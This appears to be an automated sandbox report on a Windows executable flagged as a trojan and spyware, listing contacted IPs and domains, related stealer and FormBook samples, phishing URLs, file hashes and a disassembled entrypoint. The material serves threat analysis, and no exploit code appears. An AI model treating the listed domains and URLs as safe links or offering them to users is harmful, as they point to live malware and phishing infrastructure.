                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          104.21.96.1
                                                                                                                                                                                                                          		mrodularmall.topUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          188.114.96.3
                                                                                                                                                                                                                          		legenassedk.topEuropean Union
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          104.73.234.102
                                                                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                                                                          		16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                          104.21.80.1
                                                                                                                                                                                                                          		cjlaspcorne.icuUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                          Analysis ID:1637345
                                                                                                                                                                                                                          Start date and time:2025-03-13 14:57:17 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 5m 53s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:nvtoaldlrg.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@11/7
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 4.175.87.197, 23.199.214.10, 23.60.203.209
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          09:58:08API Interceptor9x Sleep call for process: nvtoaldlrg.exe modified

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          104.21.48.1345623.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                                          • www.shlomi.app/9rzh/
                                                                                                                                                                                                                          ySUB97Jq80.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                          • www.shlomi.app/9rzh/
                                                                                                                                                                                                                          hQaXUS5gt0.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.newanthoperso.shop/3nis/
                                                                                                                                                                                                                          6nA8ZygZLP.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.rbopisalive.cyou/2dxw/
                                                                                                                                                                                                                          UhuGtHUgHf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.enoughmoney.online/z9gb/
                                                                                                                                                                                                                          Bill_of_Lading_20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                          • touxzw.ir/sccc/five/fre.php
                                                                                                                                                                                                                          Stormwater Works Drawings Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.lucynoel6465.shop/jgkl/
                                                                                                                                                                                                                          Shipment Delivery No DE0093002-PDF.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                          • touxzw.ir/tking3/five/fre.php
                                                                                                                                                                                                                          Remittance_CT022024.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                          • touxzw.ir/fix/five/fre.php
                                                                                                                                                                                                                          http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • microsoft-sharepoint4543464633.pages.dev/index-2jc93/
                                                                                                                                                                                                                          104.21.16.1https://t.co/6BJID9q49hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • tcerfw.wittnng.sbs/favicon.ico
                                                                                                                                                                                                                          J8bamK92a3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.play-vanguard-nirvana.xyz/egs9/?9r=2m/uVQwqKH2EIWlawszTKzvIepBfVH/HI19qzylF05nDLsWuBLn1pb4DiFDKEzYOkwPMwL8bVA==&vZR=H2MpG0p
                                                                                                                                                                                                                          0t7MXNEfCg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.rbopisalive.cyou/2dxw/
                                                                                                                                                                                                                          g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.sigaque.today/n61y/?UPV=BOlfS7N9ZWkGRIMRgNC6B6+WUTyM673eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBBYPYz0JSQDMkWzhvpNbFnW2/OcjAWw==&YrV=FlsDgRMx
                                                                                                                                                                                                                          0IrTeguWM7.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.tumbetgirislinki.fit/ftbq/
                                                                                                                                                                                                                          Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.rbopisalive.cyou/6m32/
                                                                                                                                                                                                                          Payment Record.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                          • touxzw.ir/sccc/five/fre.php
                                                                                                                                                                                                                          Invoice Remittance ref27022558.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                          • www.rbopisalive.cyou/a669/
                                                                                                                                                                                                                          ujXpculHYDYhc6i.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                          • touxzw.ir/sss2/five/fre.php
                                                                                                                                                                                                                          368c6e62-b031-5b65-fd43-e7a610184138.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • ce60771026585.oakdiiocese.org/p/298?session=770558a25b5d1fcbb8d81f113631d430f5b8d022cdc6d97cf6b16a412a3be9e6

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          citydisco.betSoftWare.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          FortniteHack.exe1.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          setupx 1.exe1.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          Installer64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          steamcommunity.comscript5.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                                                          https://stearncommmunity.com/profiles/52829086342741Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                                                          https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          https://sceanmcommnunmnlty.com/sotep/aofpe/zoeprGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          http://gift50steam.com/50Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 23.192.247.89
                                                                                                                                                                                                                          https://u.to/LZkkIgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                                                          noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          Q6EK7dte4N.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          jowinjoinery.icukmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          CheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          legenassedk.topL0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          ModMenu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          noypjksdaw.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          x1D44JHWDf.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          dawothjkjad.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.1567.5483.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          download.php.exe.bin.exeGet hashmaliciousAmadey, DCRat, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                          • 188.114.96.3

                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSkmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          https://zcmp-semi.maillist-manage.jp/click/11ed2c6aa12966a/11ed2c6aa12ae03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                                          nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.130.234
                                                                                                                                                                                                                          nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          nngg.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                                          awkthjjawdtrh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.136.234
                                                                                                                                                                                                                          Built.exe.bin.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          NavaioSecurityTest (2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.223.179
                                                                                                                                                                                                                          CLOUDFLARENETUSkmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          https://zcmp-semi.maillist-manage.jp/click/11ed2c6aa12966a/11ed2c6aa12ae03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                                          nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.130.234
                                                                                                                                                                                                                          nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          nngg.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                                          awkthjjawdtrh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.136.234
                                                                                                                                                                                                                          Built.exe.bin.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          NavaioSecurityTest (2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.223.179
                                                                                                                                                                                                                          CLOUDFLARENETUSkmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          https://zcmp-semi.maillist-manage.jp/click/11ed2c6aa12966a/11ed2c6aa12ae03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                                          nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.130.234
                                                                                                                                                                                                                          nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          nngg.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                                          awkthjjawdtrh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.136.234
                                                                                                                                                                                                                          Built.exe.bin.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          NavaioSecurityTest (2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.223.179
                                                                                                                                                                                                                          CLOUDFLARENETUSkmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          https://zcmp-semi.maillist-manage.jp/click/11ed2c6aa12966a/11ed2c6aa12ae03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.17.24.14
                                                                                                                                                                                                                          nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.130.234
                                                                                                                                                                                                                          nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.80.1
                                                                                                                                                                                                                          nngg.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                          • 172.67.19.24
                                                                                                                                                                                                                          awkthjjawdtrh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.64.1
                                                                                                                                                                                                                          nude.jpg.exe.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                          • 162.159.136.234
                                                                                                                                                                                                                          Built.exe.bin.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          NavaioSecurityTest (2).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.67.223.179

                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1kmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          awkthjjawdtrh.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          notyhkkadaw.exe1.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          MacAddress.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          Arly.exe1.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          CheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                                          SoftWare.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          • 104.73.234.102
                                                                                                                                                                                                                          • 188.114.96.3

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                          No created / dropped files found

                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):7.9865895613266344
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                          File name:nvtoaldlrg.exe
                                                                                                                                                                                                                          File size:1'311'232 bytes
                                                                                                                                                                                                                          MD5:4a0c3d026246920f6b8bd466cc5fdd8c
                                                                                                                                                                                                                          SHA1:2536873426bdcd8cdc5fa40b54d68cdf1a0766ff
                                                                                                                                                                                                                          SHA256:fdba4cab6bb651c5ffecf92d1bfd3de70ef5433a6aea4976db9753742799b7a3
                                                                                                                                                                                                                          SHA512:45ee538f216f1c55ef32a39a3449e6198b265457c1e0a84843559e2d8ffd6aa8b0117335148bc493466e3081a7b81c71febba262e6297b0214f93b404fc82d04
                                                                                                                                                                                                                          SSDEEP:24576:V+Fh6DotPSJFFV3jAos1aMYC8VhKbcFMaQkVHDr5fGBuBRxsP4:4FcDmSfjE1aM9Q4c2r8leBCRa
                                                                                                                                                                                                                          TLSH:3B5533C90DE29A4FE9E3E1F99A98754F03A08D18F9CB6F7429439350E1949935FCB270
                                                                                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....3.g.............................?............@..........................p<...........@................................. .....

                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Entrypoint:0x423f1d
                                                                                                                                                                                                                          Entrypoint Section:
                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                          Time Stamp:0x67D033F4 [Tue Mar 11 13:00:36 2025 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:71cc5af9daad65e58c6f29c42cdf9201

                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          add esp, FFFFFFF0h
                                                                                                                                                                                                                          mov eax, 00401000h
                                                                                                                                                                                                                          call 00007FF85CBCC216h
                                                                                                                                                                                                                          call far 5DE5h : 8B10C483h
                                                                                                                                                                                                                          jmp 00007FF85CF6DD5Ch
                                                                                                                                                                                                                          jmp 00007FF85CBCC23Dh
                                                                                                                                                                                                                          xchg byte ptr [esi+61h], ah
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          sub ebx, ebx
                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                          mov dword ptr [ebp+ecx*4+5Fh], ecx
                                                                                                                                                                                                                          mov cl, 3Bh
                                                                                                                                                                                                                          out 4Eh, al
                                                                                                                                                                                                                          jmp far 01CDh : A434CB3Eh
                                                                                                                                                                                                                          movsb
                                                                                                                                                                                                                          insd
                                                                                                                                                                                                                          cmp esp, dword ptr [ebp+366B5C85h]
                                                                                                                                                                                                                          dec ebp
                                                                                                                                                                                                                          outsb
                                                                                                                                                                                                                          jo 00007FF85CBCC1D3h
                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          jnl 00007FF85CBCC215h
                                                                                                                                                                                                                          pop eax
                                                                                                                                                                                                                          pop ds
                                                                                                                                                                                                                          cmpsb
                                                                                                                                                                                                                          xor esi, ebx
                                                                                                                                                                                                                          or al, 10h
                                                                                                                                                                                                                          idiv byte ptr [eax-0674FBB2h]
                                                                                                                                                                                                                          sbb al, 3Ch
                                                                                                                                                                                                                          cmp al, 8Ch
                                                                                                                                                                                                                          mov bl, 2Ch
                                                                                                                                                                                                                          push cs
                                                                                                                                                                                                                          mov dl, 35h
                                                                                                                                                                                                                          in al, dx
                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                          fdiv dword ptr [ebx+0E7FD101h]
                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                          xor byte ptr [ebp-46B12EB6h], bl
                                                                                                                                                                                                                          test dword ptr [ebp+2Ch], ecx
                                                                                                                                                                                                                          test byte ptr [ebx+7FBF4A8Eh], dh
                                                                                                                                                                                                                          dec edi
                                                                                                                                                                                                                          out dx, al
                                                                                                                                                                                                                          mov dl, DCh
                                                                                                                                                                                                                          lds esi, esi
                                                                                                                                                                                                                          lodsb
                                                                                                                                                                                                                          mov esp, AF31A461h
                                                                                                                                                                                                                          aaa
                                                                                                                                                                                                                          and dword ptr [eax-68A8E48Ch], ebp
                                                                                                                                                                                                                          bound ebx, dword ptr [edx-70B94344h]
                                                                                                                                                                                                                          cmp ebx, dword ptr [ebx+78h]
                                                                                                                                                                                                                          dec edi
                                                                                                                                                                                                                          dec ecx
                                                                                                                                                                                                                          and eax, B8A45AC0h
                                                                                                                                                                                                                          mov bh, F5h
                                                                                                                                                                                                                          mov esi, 41E3FA46h
                                                                                                                                                                                                                          dec ebp
                                                                                                                                                                                                                          cmpsb
                                                                                                                                                                                                                          test eax, B1F5B035h
                                                                                                                                                                                                                          rcr dword ptr [328B6098h], cl
                                                                                                                                                                                                                          cdq
                                                                                                                                                                                                                          cmp eax, BD3564A6h
                                                                                                                                                                                                                          int 67h
                                                                                                                                                                                                                          pop esp
                                                                                                                                                                                                                          cmp dword ptr [edx], C1717733h
                                                                                                                                                                                                                          fild dword ptr [eax]
                                                                                                                                                                                                                          test eax, AF6799C6h
                                                                                                                                                                                                                          mov al, 62h
                                                                                                                                                                                                                          jno 00007FF85CBCC24Dh
                                                                                                                                                                                                                          add eax, 0000D926h

                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2e20200x214.data
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e20000xc.data
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
